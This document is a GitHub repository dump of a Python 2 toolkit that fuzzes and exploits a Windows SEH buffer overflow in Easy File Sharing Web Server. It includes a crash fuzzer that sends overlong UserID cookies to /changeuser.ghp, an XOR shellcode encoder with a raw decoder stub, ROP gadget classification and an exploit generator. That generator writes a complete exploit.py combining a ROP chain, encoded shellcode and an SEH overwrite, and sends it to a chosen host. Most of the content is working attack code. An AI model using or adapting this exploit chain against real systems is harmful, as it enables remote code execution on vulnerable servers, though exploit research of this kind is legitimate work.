├── SEH_Fuzzer
    ├── Vuln
    │   ├── fsws.exe
    │   └── ImageLoad.dll
    ├── vuln
    │   ├── fsws.exe
    │   └── ImageLoad.dll
    ├── demo
    │   ├── demo_classify_gadget.py
    │   ├── demo_pointer.py
    │   ├── demo_parse_exe.py
    │   └── demo_parse_dll.py
    ├── app.py
    ├── Encoder.py
    ├── test
    │   ├── testPE.py
    │   └── PE.py
    ├── ExploitGenerator.py
    ├── Seh_bug_fuzzer.py
    ├── find_badchars.py
    ├── stack_pivot.py
    ├── fuzzer.py
    ├── ShellCode.py
    ├── PE.py
    ├── util.py
    └── Gadget.py
├── README.md
├── LICENSE
└── .gitignore


/SEH_Fuzzer/Vuln/fsws.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/b09780978/SEH_Fuzzer/HEAD/SEH_Fuzzer/Vuln/fsws.exe


--------------------------------------------------------------------------------
/SEH_Fuzzer/vuln/fsws.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/b09780978/SEH_Fuzzer/HEAD/SEH_Fuzzer/vuln/fsws.exe


--------------------------------------------------------------------------------
/SEH_Fuzzer/Vuln/ImageLoad.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/b09780978/SEH_Fuzzer/HEAD/SEH_Fuzzer/Vuln/ImageLoad.dll


--------------------------------------------------------------------------------
/SEH_Fuzzer/vuln/ImageLoad.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/b09780978/SEH_Fuzzer/HEAD/SEH_Fuzzer/vuln/ImageLoad.dll


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # SEH_Fuzzer
 2 | This is a fuzzer for Windows SEH buffer overflow.
 3 | 
 4 | Requirement:
 5 | ------------
 6 | 
 7 | python2.7
 8 | 
 9 |     pydbg
10 |     
11 |     pydasm
12 | 
13 |     capstone-windows
14 |   
15 |     pefile
16 | 


--------------------------------------------------------------------------------
/SEH_Fuzzer/demo/demo_classify_gadget.py:
--------------------------------------------------------------------------------
 1 | from PE import *
 2 | from util import *
 3 | from Gadget import *
 4 | 
 5 | exe_path = "D:\\testPoc\\Easy File Sharing Web Server\\fsws.exe"
 6 | 
 7 | module_list = getModuleList(exe_path)
 8 | module_list.append(exe_path)
 9 | 
10 | # Get all usable gadgets.
11 | collect_gadgets = {}
12 | for module in module_list:
13 | 	pe = PE(module)
14 | 	if (not pe.ASLR) and (not pe.SafeSEH) and (not pe.Rebase):
15 | 		print "[+] Module %s add." % module
16 | 		module_gadget = Gadget(pe)
17 | 		classify_gadget(module_gadget.retGadgets, module_gadget.jmpGadgets, collect_gadgets)
18 | 
19 | print
20 | 
21 | for types in collect_gadgets.keys():
22 | 	print "+" + "-"*(len(types)+2) + "+"
23 | 	print "| " + types + " |"
24 | 	print "+" + "-"*(len(types)+2) + "+"
25 | 	print
26 | 	for addr, gadget in collect_gadgets[types].items():
27 | 		print "[*] 0x%08x : %s." % (addr, gadget)
28 | 	print


--------------------------------------------------------------------------------
/SEH_Fuzzer/demo/demo_pointer.py:
--------------------------------------------------------------------------------
 1 | from PE import *
 2 | from util import *
 3 | from Gadget import *
 4 | 
 5 | exe_path = "D:\\testPoc\\Easy File Sharing Web Server\\fsws.exe"
 6 | 
 7 | module_list = getModuleList(exe_path)
 8 | module_list.append(exe_path)
 9 | 
10 | import random
11 | 
12 | IAT = {}
13 | writableAddress = {}
14 | print
15 | for module in module_list:
16 | 	print module
17 | 	pe = PE(module)
18 | 	IAT.update( { module: pe.IAT } )
19 | 	for section in pe.DataSections:
20 | 		vaddr = section["vaddr"] + random.randint(0, section["size"])
21 | 		for test in xrange(5):
22 | 			if gadget_filter(vaddr):
23 | 				writableAddress.update( { vaddr : module } )
24 | 				break
25 | 
26 | print "[+] IAT"
27 | print
28 | for entry in IAT.keys():
29 | 	print "[+] Module %s" % entry
30 | 	for func, vaddr in IAT[entry].items():
31 | 		if gadget_filter(vaddr):
32 | 			print "[*]%-30s : 0x%08x." % (func, vaddr)
33 | 	print
34 | 
35 | print
36 | print "[+] writable Address"
37 | print
38 | for vaddr, module in writableAddress.items():
39 | 	print "[*]%-10s : 0x%08x" % (module, vaddr)


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2017 b09780978
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/SEH_Fuzzer/demo/demo_parse_exe.py:
--------------------------------------------------------------------------------
 1 | import sys
 2 | import os
 3 | 
 4 | CURRENT_DIR = os.getcwd()
 5 | PE_DIR = "\\".join(CURRENT_DIR.split("\\")[:-1])
 6 | print "[+] Current position: %s" % (CURRENT_DIR)
 7 | print "[+] PE class position: %s" % (PE_DIR)
 8 | print
 9 | 
10 | # add PE class folder
11 | sys.path.append(PE_DIR)
12 | from PE import *
13 | 
14 | exe = PE_DIR + "\\vuln\\fsws.exe"
15 | 
16 | pe = PE(exe)
17 | 
18 | print "[+] Analysis %s." % (pe.Name)
19 | print "[*] Format is %s." % (pe.Format)
20 | print "[*] Type is %s." % (pe.Type)
21 | print "[*] Arch is %s." % (pe.Arch)
22 | print "[*] Bits is %d." % (pe.Bits)
23 | print "[*] EntryPoint is 0x%08x." % (pe.EntryPoint)
24 | print "[*] Rebase is", "on." if pe.Rebase else "off."
25 | print
26 | 
27 | print "[+] DataSections:"
28 | print "[*] %-8s %-10s %-10s %-10s" % ("name", "vaddr", "offset", "size")
29 | for section in pe.DataSections:
30 | 	print "   %-8s 0x%-08x 0x%-08x 0x%-08x" % (section["name"], section["vaddr"], section["offset"], section["size"])
31 | print "[+] Total: %d datasection." % (len(pe.DataSections))
32 | print
33 | 
34 | print "[+] ExecSections:"
35 | print "[*] %-8s %-10s %-10s %-10s" % ("name", "vaddr", "offset", "size")
36 | for section in pe.ExecSections:
37 | 	print "   %-8s 0x%-08x 0x%-08x 0x%-08x" % (section["name"], section["vaddr"], section["offset"], section["size"])
38 | print "[+] Total: %d execsection." % (len(pe.ExecSections))
39 | print
40 | 


--------------------------------------------------------------------------------
/SEH_Fuzzer/demo/demo_parse_dll.py:
--------------------------------------------------------------------------------
 1 | import sys
 2 | import os
 3 | 
 4 | CURRENT_DIR = os.getcwd()
 5 | PE_DIR = "\\".join(CURRENT_DIR.split("\\")[:-1])
 6 | print "[+] Current position: %s" % (CURRENT_DIR)
 7 | print "[+] PE class position: %s" % (PE_DIR)
 8 | print
 9 | 
10 | # add PE class folder
11 | sys.path.append(PE_DIR)
12 | from PE import *
13 | 
14 | exe = PE_DIR + "\\vuln\\ImageLoad.dll"
15 | 
16 | pe = PE(exe)
17 | 
18 | print "[+] Analysis %s." % (pe.Name)
19 | print "[*] Format is %s." % (pe.Format)
20 | print "[*] Type is %s." % (pe.Type)
21 | print "[*] Arch is %s." % (pe.Arch)
22 | print "[*] Bits is %d." % (pe.Bits)
23 | print "[*] EntryPoint is 0x%08x." % (pe.EntryPoint)
24 | print "[*] Rebase is", "on." if pe.Rebase else "off."
25 | print
26 | 
27 | print "[+] DataSections:"
28 | print "[*] %-8s %-10s %-10s %-10s" % ("name", "vaddr", "offset", "size")
29 | for section in pe.DataSections:
30 | 	print "   %-8s 0x%-08x 0x%-08x 0x%-08x" % (section["name"], section["vaddr"], section["offset"], section["size"])
31 | print "[+] Total: %d datasection." % (len(pe.DataSections))
32 | print
33 | 
34 | print "[+] ExecSections:"
35 | print "[*] %-8s %-10s %-10s %-10s" % ("name", "vaddr", "offset", "size")
36 | for section in pe.ExecSections:
37 | 	print "   %-8s 0x%-08x 0x%-08x 0x%-08x" % (section["name"], section["vaddr"], section["offset"], section["size"])
38 | print "[+] Total: %d execsection." % (len(pe.ExecSections))
39 | print
40 | 


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
  1 | # Byte-compiled / optimized / DLL files
  2 | __pycache__/
  3 | *.py[cod]
  4 | *$py.class
  5 | 
  6 | # C extensions
  7 | *.so
  8 | 
  9 | # Distribution / packaging
 10 | .Python
 11 | env/
 12 | build/
 13 | develop-eggs/
 14 | dist/
 15 | downloads/
 16 | eggs/
 17 | .eggs/
 18 | lib/
 19 | lib64/
 20 | parts/
 21 | sdist/
 22 | var/
 23 | wheels/
 24 | *.egg-info/
 25 | .installed.cfg
 26 | *.egg
 27 | 
 28 | # PyInstaller
 29 | #  Usually these files are written by a python script from a template
 30 | #  before PyInstaller builds the exe, so as to inject date/other infos into it.
 31 | *.manifest
 32 | *.spec
 33 | 
 34 | # Installer logs
 35 | pip-log.txt
 36 | pip-delete-this-directory.txt
 37 | 
 38 | # Unit test / coverage reports
 39 | htmlcov/
 40 | .tox/
 41 | .coverage
 42 | .coverage.*
 43 | .cache
 44 | nosetests.xml
 45 | coverage.xml
 46 | *.cover
 47 | .hypothesis/
 48 | 
 49 | # Translations
 50 | *.mo
 51 | *.pot
 52 | 
 53 | # Django stuff:
 54 | *.log
 55 | local_settings.py
 56 | 
 57 | # Flask stuff:
 58 | instance/
 59 | .webassets-cache
 60 | 
 61 | # Scrapy stuff:
 62 | .scrapy
 63 | 
 64 | # Sphinx documentation
 65 | docs/_build/
 66 | 
 67 | # PyBuilder
 68 | target/
 69 | 
 70 | # Jupyter Notebook
 71 | .ipynb_checkpoints
 72 | 
 73 | # pyenv
 74 | .python-version
 75 | 
 76 | # celery beat schedule file
 77 | celerybeat-schedule
 78 | 
 79 | # SageMath parsed files
 80 | *.sage.py
 81 | 
 82 | # dotenv
 83 | .env
 84 | 
 85 | # virtualenv
 86 | .venv
 87 | venv/
 88 | ENV/
 89 | 
 90 | # Spyder project settings
 91 | .spyderproject
 92 | .spyproject
 93 | 
 94 | # Rope project settings
 95 | .ropeproject
 96 | 
 97 | # mkdocs documentation
 98 | /site
 99 | 
100 | # mypy
101 | .mypy_cache/
102 | 


--------------------------------------------------------------------------------
/SEH_Fuzzer/app.py:
--------------------------------------------------------------------------------
 1 | from kivy.app import App
 2 | from kivy.uix.gridlayout import GridLayout
 3 | from kivy.uix.label import Label
 4 | from kivy.uix.textinput import TextInput
 5 | from kivy.uix.button import Button
 6 | 
 7 | import subprocess
 8 | import cPickle
 9 | import os
10 | 
11 | class Column(GridLayout):
12 | 	def __init__(self, cols, **kwargs):
13 | 		super(Row, self).__init__(**kwargs)
14 | 		self.cols = cols
15 | 		
16 | 
17 | class Screen(GridLayout):
18 | 	def __init__(self, **kwargs):
19 | 		super(Screen, self).__init__(**kwargs)
20 | 		self.cols = 2
21 | 		self.add_widget(Label(text="Target"))
22 | 		self.target = TextInput(multiline=False)
23 | 		self.add_widget(self.target)
24 | 		self.add_widget(Label(text="target info"))
25 | 		self.setting = TextInput()
26 | 		self.add_widget(self.setting)
27 | 		fuzz_btn = Button(text="Fuzz")
28 | 		self.add_widget(fuzz_btn)
29 | 		self.result = Label(text="None")
30 | 		self.add_widget(self.result)
31 | 		fuzz_btn.bind(on_press=self.show_result)
32 | 
33 | 	def show_result(self, obj):
34 | 		try:
35 | 			proc = subprocess.check_call("python Seh_bug_Fuzzer.py", shell=True)
36 | 			with open("crash_info.pkl", "rb") as f:
37 | 				max_offset = cPickle.load(f)
38 | 				seh_offset = cPickle.load(f)
39 | 
40 | 			RESULT = "[+] When send %d words will crash.\n" % (max_offset)
41 | 			RESULT += "[+] Overwrite SEH structure need %d words.\n" % (seh_offset)
42 | 			RESULT += "[+] Dump crash stack in crash.txt."
43 | 			self.result.text = RESULT
44 | 			
45 | 			subprocess.check_call("notepad crash.txt", shell=True)
46 | 				
47 | 		except Exception as e:
48 | 			print str(e)
49 | 			self.result.text += "[-] Fail."
50 | 			print '[-] Fail'
51 | 
52 | class MyApp(App):
53 | 	def build(self):
54 | 		return Screen()
55 | 
56 | if __name__ == "__main__":
57 | 	MyApp().run()


--------------------------------------------------------------------------------
/SEH_Fuzzer/Encoder.py:
--------------------------------------------------------------------------------
 1 | # -*- coding: utf-8 -*-
 2 | import random
 3 | import struct
 4 | 
 5 | SHELLCODE_FORMAT  = ""
 6 | SHELLCODE_FORMAT += "\xeb\x2e\x5e\x56\x89\xf7\x31\xc0\x31\xdb"
 7 | SHELLCODE_FORMAT += "\x31\xc9\x31\xd2\x8a\x06\x8a\x5e\x01\x30"
 8 | SHELLCODE_FORMAT += "\xd8\x88\x07\x47\x46\x41\x80\xf9\x03\x75"
 9 | SHELLCODE_FORMAT += "\xef\x46\x31\xc9\x66\x83\xc2\x04\x66\x81"
10 | SHELLCODE_FORMAT += "\xfa%s\x75\xe1\xff\x14\x24\xe8\xcd"
11 | SHELLCODE_FORMAT += "\xff\xff\xff%s"
12 | 
13 | def getPythonCode(code):
14 |     codes = "shellcode = \""
15 |     for c in code:
16 |         cc = hex(ord(c))
17 |         codes += "\\x0" + cc[2:] if len(cc)<4 else "\\x" + cc[2:]
18 |     codes += "\""
19 |     return codes
20 | 
21 | def xor(block):
22 |     code = bytearray()
23 |     seed = random.randint(1, 255)
24 |     c1 = seed ^ block[0]
25 |     c2 = c1 ^ block[1]
26 |     c3 = c2 ^ block[2]
27 |     code.append(seed)
28 |     code.append(c1)
29 |     code.append(c2)
30 |     code.append(c3)
31 | 
32 |     return code
33 | 
34 | class Encoder(object):
35 |     def __init__(self, shellcode, badchars="\x00\x0a"):
36 |         self.shellcode = shellcode
37 |         self.badchars = badchars
38 | 
39 |     def encode(self):
40 |         codes = bytearray()
41 |         codes.extend(self.shellcode)
42 |         result = ""
43 | 
44 |         if len(codes)%3==1:
45 |             codes.append(0x90)
46 |             codes.append(0x90)
47 |         elif len(codes)%3==2:
48 |             codes.append(0x90)
49 | 
50 |         for i in xrange(0, len(codes), 3):
51 |             pattern = codes[i:i+3]
52 |             block = xor(pattern)
53 |             block = self.check_bad_chars(pattern, block)
54 |             result += block
55 | 
56 |         for bc in self.badchars:
57 |             if struct.pack("<H", len(result)).find(bc)!=-1:
58 |                 result += "\x90"*4
59 | 
60 |         return SHELLCODE_FORMAT % (struct.pack("<H", len(result)), result)
61 | 
62 |     def check_bad_chars(self, orgin, block):
63 |         for c in self.badchars:
64 |             if block.find(c)!=-1:
65 |                 block = xor(orgin)
66 |         return block
67 | 


--------------------------------------------------------------------------------
/SEH_Fuzzer/test/testPE.py:
--------------------------------------------------------------------------------
  1 | import unittest
  2 | import sys
  3 | import os
  4 | 
  5 | CURRENT_DIR = os.getcwd()
  6 | PE_DIR = "\\".join(CURRENT_DIR.split("\\")[:-1])
  7 | print "[+] Current position: %s" % (CURRENT_DIR)
  8 | print "[+] PE class position: %s" % (PE_DIR)
  9 | 
 10 | # add PE class position
 11 | sys.path.append(PE_DIR)
 12 | from PE import *
 13 | 
 14 | print
 15 | print "[+] Start test."
 16 | 
 17 | '''
 18 | 	TestCase information
 19 | '''
 20 | 
 21 | NORMAL_EXE = PE_DIR + "\\vuln\\fsws.exe"
 22 | NORMAL_DLL = PE_DIR + "\\vuln\\ImageLoad.dll"
 23 | ERROR_EXE = "abc.exe"
 24 | ERROR_DLL = "abc.dll"
 25 | 
 26 | TESTCASES = {
 27 | 	NORMAL_EXE : {
 28 | 		"ARCH" : "intel",
 29 | 		"TYPE" : "exe",
 30 | 		"FORMAT" : "PE",
 31 | 		"BITS" : 32,
 32 | 		"ENTRYPOINT" : 0x004fc060,
 33 | 		"REBASE" : False
 34 | 	},
 35 | 	NORMAL_DLL : {
 36 | 		"ARCH" : "intel",
 37 | 		"TYPE" : "dll",
 38 | 		"FORMAT" : "PE",
 39 | 		"BITS" : 32,
 40 | 		"ENTRYPOINT" : 0x1001ab40,
 41 | 		"REBASE" : False
 42 | 	},
 43 | 	ERROR_EXE : {
 44 | 		
 45 | 	},
 46 | 	ERROR_DLL : {
 47 | 	
 48 | 	}
 49 | }
 50 | 
 51 | class PETestCase(unittest.TestCase):
 52 | 	'''
 53 | 		Basic setUp(),tearDown() and log() functions
 54 | 	'''
 55 | 	def setUp(self):
 56 | 		self.pe = None
 57 | 
 58 | 	def tearDown(self):
 59 | 		self.pe = None
 60 | 		
 61 | 	def log(self, testcase):
 62 | 		print "[+] Passing TestCase %s." % (testcase)
 63 | 		
 64 | 	'''
 65 | 		test normal testcase
 66 | 	'''
 67 | 
 68 | 	def test_NORMAL_EXE(self):
 69 | 		self.pe = PE(NORMAL_EXE)
 70 | 		self.assertEqual(self.pe.Arch, TESTCASES[NORMAL_EXE]["ARCH"])
 71 | 		self.assertEqual(self.pe.Type, TESTCASES[NORMAL_EXE]["TYPE"])
 72 | 		self.assertEqual(self.pe.Format, TESTCASES[NORMAL_EXE]["FORMAT"])
 73 | 		self.assertEqual(self.pe.Bits, TESTCASES[NORMAL_EXE]["BITS"])
 74 | 		self.assertEqual(self.pe.EntryPoint, TESTCASES[NORMAL_EXE]["ENTRYPOINT"])
 75 | 		self.assertEqual(self.pe.Rebase, TESTCASES[NORMAL_EXE]["REBASE"])
 76 | 		self.log("MNORMAL_EXE: " + NORMAL_EXE)
 77 | 		
 78 | 	def test_NORMAL_DLL(self):
 79 | 		self.pe = PE(NORMAL_DLL)
 80 | 		self.assertEqual(self.pe.Arch, TESTCASES[NORMAL_DLL]["ARCH"])
 81 | 		self.assertEqual(self.pe.Type, TESTCASES[NORMAL_DLL]["TYPE"])
 82 | 		self.assertEqual(self.pe.Format, TESTCASES[NORMAL_DLL]["FORMAT"])
 83 | 		self.assertEqual(self.pe.Bits, TESTCASES[NORMAL_DLL]["BITS"])
 84 | 		self.assertEqual(self.pe.EntryPoint, TESTCASES[NORMAL_DLL]["ENTRYPOINT"])
 85 | 		self.assertEqual(self.pe.Rebase, TESTCASES[NORMAL_DLL]["REBASE"])
 86 | 		self.log("NNORMAL_DLL: " + NORMAL_DLL)
 87 | 		
 88 | 	'''
 89 | 		test error testcase
 90 | 	'''
 91 | 	def test_ERROR_EXE(self):
 92 | 		try:
 93 | 			self.pe = PE(ERROR_EXE)
 94 | 		except Exception as e:
 95 | 			self.assertTrue( isinstance(e, PEError))
 96 | 		self.log("ERROR_EXE: " + ERROR_EXE)
 97 | 			
 98 | 	def test_ERROR_DLL(self):
 99 | 		try:
100 | 			self.pe = PE(ERROR_DLL)
101 | 		except Exception as e:
102 | 			self.assertTrue( isinstance(e, PEError))
103 | 		self.log("EERROR_DLL: " + ERROR_DLL)
104 | 
105 | if __name__ == "__main__":
106 | 	unittest.main()


--------------------------------------------------------------------------------
/SEH_Fuzzer/ExploitGenerator.py:
--------------------------------------------------------------------------------
  1 | # -*- coding: utf-8 -*-
  2 | import cPickle
  3 | from ShellCode import *
  4 | from Encoder import *
  5 | 
  6 | exploit = "exploit.py"
  7 | 
  8 | '''
  9 | IMPORT_MODULES = "import argparse\n"
 10 | IMPORT_MODULES += "import struct"
 11 | '''
 12 | IMPORT_MODULES = """import argparse
 13 | import struct
 14 | import socket
 15 | """
 16 | PARSER = """parser = argparse.ArgumentParser(description="This is an exploit.")
 17 | parser.add_argument("host", nargs="?", type=str, help="Host to attack.")
 18 | parser.add_argument("port", nargs="?", type=int, help="Port to attack.")
 19 | parser.set_defaults(host="127.0.0.1")
 20 | parser.set_defaults(port=80)
 21 | 
 22 | parser.print_help()
 23 | 
 24 | args = parser.parse_args()
 25 | host, port = args.host, args.port
 26 | """
 27 | 
 28 | crash_info = "crash_info.pkl"
 29 | find_badchars = "badchars.pkl"
 30 | stackpivot = "stackpivot.pkl"
 31 | ropchain = "ropchain.pkl"
 32 | 
 33 | # Get script offset.
 34 | with open(crash_info, "rb") as local_file:
 35 | 	max_size = cPickle.load(local_file)
 36 | 	seh_offset = cPickle.load(local_file)
 37 | 
 38 | # Get badchars.
 39 | with open(find_badchars, "rb") as local_file:
 40 | 	badchars = cPickle.load(local_file)
 41 | 
 42 | # Get stackpivot infomation.
 43 | with open(stackpivot, "rb") as local_file:
 44 | 	gadget = cPickle.load(local_file)
 45 | 	for addr, instructions in gadget.items():
 46 | 		moveup_gadget = (addr, instructions)
 47 | 	moveup_offset = cPickle.load(local_file)
 48 | 	stack_move = cPickle.load(local_file)
 49 | 	stack_fix = cPickle.load(local_file)
 50 | 
 51 | # Get ROP Chain
 52 | with open(ropchain, "rb") as local_file:
 53 | 	rop_chain = cPickle.load(local_file)
 54 | 
 55 | TAB = " " * 4
 56 | tab = TAB * 0
 57 | 
 58 | ropchainCode = "ropchain = [\n"
 59 | tab = TAB * 1
 60 | for addr, instructions in rop_chain:
 61 | 	ropchainCode += tab + hex(addr) + ", # " + instructions + "\n"
 62 | ropchainCode += "]\n"
 63 | ropchainCode += "ropchain = \"\".join(struct.pack(\"<I\", _) for _ in ropchain)\n"
 64 | 
 65 | tab = TAB * 0
 66 | 
 67 | coder = ShellCode({"type":"win_cmd", "cmd":"calc.exe"})
 68 | shellcode = coder.getShellCode()
 69 | encoder = Encoder(shellcode, badchars)
 70 | shellcode = encoder.encode()
 71 | 
 72 | shellcode = getPythonCode(shellcode)
 73 | 
 74 | rop_offset = moveup_offset - stack_move + stack_fix
 75 | offset = (
 76 | 	"max_size = " + str(max_size) + "\n"
 77 | 	"seh_offset = " + str(seh_offset) + "\n"
 78 | 	"rop_offset = " + str(rop_offset) + "\n"
 79 | )
 80 | 
 81 | buffer = (
 82 | "buffer = \"\"\n"
 83 | "buffer += \"A\" * rop_offset\n"
 84 | "buffer += ropchain\n"
 85 | "buffer += shellcode\n"
 86 | "buffer += \"A\" * (seh_offset-len(buffer))\n"
 87 | "buffer += \"nseh\"\n"
 88 | "buffer += struct.pack(\"<I\"," + hex(moveup_gadget[0]) + ") # " + moveup_gadget[1] +"\n"
 89 | "buffer += \"A\" * (max_size-len(buffer))\n"
 90 | )
 91 | 
 92 | request = (
 93 | "request = (\n"
 94 | "\"GET /changeuser.ghp HTTP/1.1\\r\\n\"\n"
 95 | "\"User-Agent: Mozilla/4.0\\r\\n\"\n"
 96 | "\"Host:\" " + "+ host + " + "\":\"" + " + str(port) + " + "\"\\r\\n\"\n"
 97 | "\"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n\"\n"
 98 | "\"Accept-Language: en-us\\r\\n\"\n"
 99 | "\"Accept-Encoding: gzip, deflate\\r\\n\"\n"
100 | "\"Referer: http://" + "host" + "/\\r\\n\"\n"
101 | "\"Cookie: SESSIONID=6771; UserID=\"" + " + buffer + " + "\"; PassWD=;\\r\\n\"\n"
102 | "\"Conection: Keep-Alive\\r\\n\\r\\n\"\n"
103 | ")\n"
104 | )
105 | 
106 | attacker = """print "[+] Attack " + host + ":" + str(port)
107 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
108 | s.connect((host, port))
109 | s.send(request)
110 | s.close()
111 | print "[+] Finish."
112 | """
113 | 
114 | with open("exploit.py", "w") as exp:
115 | 	exp.write(IMPORT_MODULES)
116 | 	exp.write("\n")
117 | 	exp.write(PARSER)
118 | 	exp.write("\n")
119 | 	exp.write(ropchainCode)
120 | 	exp.write("\n")
121 | 	exp.write(shellcode)
122 | 	exp.write("\n")
123 | 	exp.write(offset)
124 | 	exp.write("\n")
125 | 	exp.write(buffer)
126 | 	exp.write("\n")
127 | 	exp.write(request)
128 | 	exp.write("\n")
129 | 	exp.write(attacker)


--------------------------------------------------------------------------------
/SEH_Fuzzer/Seh_bug_fuzzer.py:
--------------------------------------------------------------------------------
  1 | # -*- coding: utf-8 -*-
  2 | import time
  3 | import sys
  4 | import socket
  5 | import cPickle
  6 | import os
  7 | 
  8 | from pydbg import *
  9 | from pydbg.defines import *
 10 | 
 11 | from util import *
 12 | 
 13 | PICKLE_NAME = "crash_info.pkl"
 14 | 
 15 | exe_path = "D:\\testPoc\\Easy File Sharing Web Server\\fsws.exe"
 16 | 
 17 | import threading
 18 | import time
 19 | 
 20 | host, port = "127.0.0.1", 80
 21 | 
 22 | global Running
 23 | global lock
 24 | global chance
 25 | global MAX_OFFSET
 26 | global OFFSET
 27 | 
 28 | chance = 2
 29 | Running = True
 30 | lock = threading.Lock()
 31 | 
 32 | def check_access_validation(dbg):
 33 | 	global chance
 34 | 	global Running
 35 | 	global lock
 36 | 
 37 | 	with lock:
 38 | 		if dbg.dbg.u.Exception.dwFirstChance:
 39 | 			chance -= 1
 40 | 			# prevent test next size.
 41 | 			Running = False
 42 | 			if chance==0:
 43 | 				Running = False
 44 | 				for seh_handler, nseh_handler in dbg.seh_unwind():
 45 | 					seh, nseh = seh_handler, nseh_handler
 46 | 					seh_offset = pattern_find(seh, MAX_OFFSET)
 47 | 					if seh_offset!=-1:
 48 | 						break
 49 | 				
 50 | 				print "[+] crash in %d words" % OFFSET
 51 | 				print "[+] seh offset %s." % seh_offset
 52 | 				with open(PICKLE_NAME, "wb") as phase_file:
 53 | 					cPickle.dump(OFFSET, phase_file)
 54 | 					cPickle.dump(seh_offset, phase_file)
 55 | 					cPickle.dump(seh, phase_file)
 56 | 					cPickle.dump(nseh, phase_file)
 57 | 
 58 | 				with open("crash.txt", "w") as f:
 59 | 					f.write("seh: 0x%08x\n" % seh)
 60 | 					f.write("nseh: 0x%08x\n" % nseh)
 61 | 					f.write(dbg.dump_context(stack_depth=1000))
 62 | 				dbg.terminate_process()
 63 | 				return DBG_EXCEPTION_NOT_HANDLED
 64 | 			else:
 65 | 				Running = True
 66 | 			return DBG_EXCEPTION_NOT_HANDLED
 67 | 
 68 | 		return DBG_EXCEPTION_NOT_HANDLED
 69 | 
 70 | class Fuzzer(object):
 71 | 	def __init__(self, exe_path, max_offset = 8000):
 72 | 		self.exe_path = exe_path
 73 | 		self.pid = None
 74 | 		self.dbg = None
 75 | 		global MAX_OFFSET
 76 | 		MAX_OFFSET = max_offset
 77 | 		# self.running = True
 78 | 		
 79 | 		self.dbgThread = threading.Thread(target=self.start_debugger)
 80 | 		self.dbgThread.setDaemon(False)
 81 | 		self.dbgThread.start()
 82 | 		
 83 | 		# Wait debugger start process
 84 | 		while self.pid is None:
 85 | 			time.sleep(1)
 86 | 		
 87 | 		self.monitorThread = threading.Thread(target=self.monitor_debugger)
 88 | 		self.monitorThread.setDaemon(False)
 89 | 		self.monitorThread.start()
 90 | 			
 91 | 	def monitor_debugger(self):
 92 | 		global Running
 93 | 		global OFFSET
 94 | 		test_words = 0
 95 | 		raw_input("[+] Please start the debugger...")
 96 | 		while  Running and MAX_OFFSET>test_words:
 97 | 			with lock:
 98 | 				if not Running:
 99 | 					break
100 | 				test_words += 100
101 | 				OFFSET = test_words
102 | 				print "[+] test %d words" % test_words
103 | 				s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
104 | 				s.connect((host, port))
105 | 				buffer = pattern_create(test_words)
106 | 				httpreq = (
107 | 					"GET /changeuser.ghp HTTP/1.1\r\n"
108 | 					"User-Agent: Mozilla/4.0\r\n"
109 | 					"Host:" + host + ":" + str(port) + "\r\n"
110 | 					"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
111 | 					"Accept-Language: en-us\r\n"
112 | 					"Accept-Encoding: gzip, deflate\r\n"
113 | 					"Referer: http://" + host + "/\r\n"
114 | 					"Cookie: SESSIONID=6771; UserID=" + buffer + "; PassWD=;\r\n"
115 | 					"Conection: Keep-Alive\r\n\r\n"
116 | 				)
117 | 				s.send(httpreq)
118 | 				s.close()
119 | 
120 | 				# prevent execute to fast.
121 | 				time.sleep(1)
122 | 
123 | 		if not os.path.isfile(PICKLE_NAME):
124 | 			print "[+] No found bug."
125 | 			Running = False
126 | 			self.dbg.terminate_process()
127 | 		else:
128 | 			print "[+] Find bug."
129 | 			
130 | 	'''
131 | 		Try to start debugger and run it.
132 | 	'''
133 | 	def start_debugger(self):
134 | 		try:
135 | 			self.dbg = pydbg()
136 | 			self.dbg.load(self.exe_path)
137 | 			self.pid = self.dbg.pid
138 | 		except pdx:
139 | 			print "[+] Can't open file, please check file path"
140 | 			sys.exit(1)
141 | 		except Exception as e:
142 | 			print "[+] Unknow error: ", str(e)
143 | 			sys.exit(1)
144 | 
145 | 		self.dbg.set_callback(EXCEPTION_ACCESS_VIOLATION, check_access_validation)
146 | 		self.dbg.run()
147 | 		
148 | exe_path = "D:\\testPoc\\Easy File Sharing Web Server\\fsws.exe"
149 | Fuzzer(exe_path)


--------------------------------------------------------------------------------
/SEH_Fuzzer/find_badchars.py:
--------------------------------------------------------------------------------
  1 | # -*- coding: utf-8 -*-
  2 | import time
  3 | import sys
  4 | import socket
  5 | import cPickle
  6 | import os
  7 | 
  8 | from pydbg import *
  9 | from pydbg.defines import *
 10 | 
 11 | from util import *
 12 | 
 13 | LAST_PICKLE_NAME = "crash_info.pkl"
 14 | PICKLE_NAME = "badchars.pkl"
 15 | 
 16 | exe_path = "D:\\testPoc\\Easy File Sharing Web Server\\fsws.exe"
 17 | 
